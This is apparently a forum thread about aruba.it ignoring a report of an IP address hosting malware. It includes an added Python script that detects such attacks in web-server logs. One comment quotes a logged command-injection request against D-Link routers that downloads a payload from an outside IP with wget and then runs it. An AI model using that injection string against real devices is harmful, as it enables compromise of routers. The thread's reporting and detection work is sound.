
Aruba.it blind to malicious code hosting - maxhq
I tried to notify aruba.it of someone obviously hosting malicious code and trying to attack web servers:
http://80.211.112.150/k

(Reverse DNS resolves to their domain)

Their reaction?
1. In the chat they redirect me to the dedicated hosting support form („only way to do it“)
2. Dedicated hosting support just closes my ticket.

Wow!
======
cs02rm0
I got this too (amongst other hosts).

nginx_1 | 197.39.15.48 - - [30/Aug/2018:14:51:22 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.112.150/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1" 400 173 "-" "LMAO/2.0" "-"

Apparently targeting D-Link routers -
https://twitter.com/txalin/status/1007625620090707974?lang=en
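
An added example, not part of the thread: a small Python check that flags access-log lines like the one quoted in the comment above (a shell separator followed by a download tool in the URL-decoded query string) and groups the hits by the host serving the payload, which is the evidence an abuse report would cite. The function names are hypothetical; the first sample line is the log entry from the comment with the link markup removed, the second is constructed.

```python
import re
from urllib.parse import unquote, urlsplit

# nginx access-log line; the docker-compose "nginx_1 | " prefix is optional.
LINE_RE = re.compile(
    r'^(?:\S+\s+\|\s+)?(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \d+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)
# Shell separator, then a download tool, then the URL it fetches.
FETCH_RE = re.compile(
    r"[;|&`]\s*(?:wget|curl|tftp)\s+(?P<url>\w+://[^\s;'\"]+)", re.I)

SAMPLE = [
    # Log entry quoted in the comment above.
    'nginx_1 | 197.39.15.48 - - [30/Aug/2018:14:51:22 +0000] "GET '
    '/login.cgi?cli=aa%20aa%27;wget%20http://80.211.112.150/k%20-O%20/tmp/ks;'
    'chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1" 400 173 "-" "LMAO/2.0" "-"',
    # Constructed benign request: "wget" appears, but not after a separator.
    '203.0.113.7 - - [30/Aug/2018:14:52:01 +0000] "GET /index.html?q=wget%20manual '
    'HTTP/1.1" 200 612 "-" "Mozilla/5.0" "-"',
]

def find_injection(line):
    """Return details of a download-and-run attempt in one log line, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    path, _, query = m["target"].partition("?")
    hit = FETCH_RE.search(unquote(query))  # decode %20, %27 before matching
    if not hit:
        return None
    return {
        "source_ip": m["src"], "timestamp": m["ts"], "path": path,
        "status": int(m["status"]), "user_agent": m["ua"],
        "payload_host": urlsplit(hit["url"]).hostname,
    }

def payload_hosts(lines):
    """Group hits by the host serving the payload."""
    hosts = {}
    for line in lines:
        hit = find_injection(line)
        if hit:
            hosts.setdefault(hit["payload_host"], []).append(hit)
    return hosts

if __name__ == "__main__":
    for host, hits in payload_hosts(SAMPLE).items():
        print(host, [(h["source_ip"], h["timestamp"], h["status"]) for h in hits])
```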

------
HelloNurse
You are dealing with customer support for some Aruba customer, i.e. not you.
Why don't you contact police or the site owner instead?

If it's a hacked server, the owner has to notice the hack and ask for help
cleaning up if necessary. You have no authority whatsoever, and if you attempt
to stir up trouble about someone's web site, closing tickets is at the polite
end of the response spectrum. You risk prosecution.

If it's a brazen criminal using their own host, they are the customer and the
site is working as expected. No customer support required.

~~~
maxhq
Errr... reading your points I presume you've never really done that (notifying
a service provider).

> Why don't you contact police or the site owner instead?

Police? Seriously? My police here in Germany or the Italian police? What do
you think will happen? Right: nothing. Site owner? If you can tell me the site
owner from an IP... I will do that.

> You risk prosecution.

By telling a service provider that they host malicious content and should do
sth. about it? Now that's an interesting view.

> If it's a brazen criminal using their own host [...] No customer support
> required.

The customer support was the only way to contact the provider. It doesn't
matter if they are housing or hosting malicious content. They are at least
partly responsible, especially if someone is telling them.

~~~
HelloNurse
You are trying to intimidate a provider into messing with someone else's site,
which amounts to hacking or worse.

------
hotpotjunkie
There's basically nothing you can do besides notify their abuse desk and
probably get ignored, because abuse desks pay little attention to one-off
complaints like that. If they do get taken down, it'll be by one of the larger
security companies who detect the page (for example, if that IP sends spam)
and include it in their feed of bad IPs to aruba.

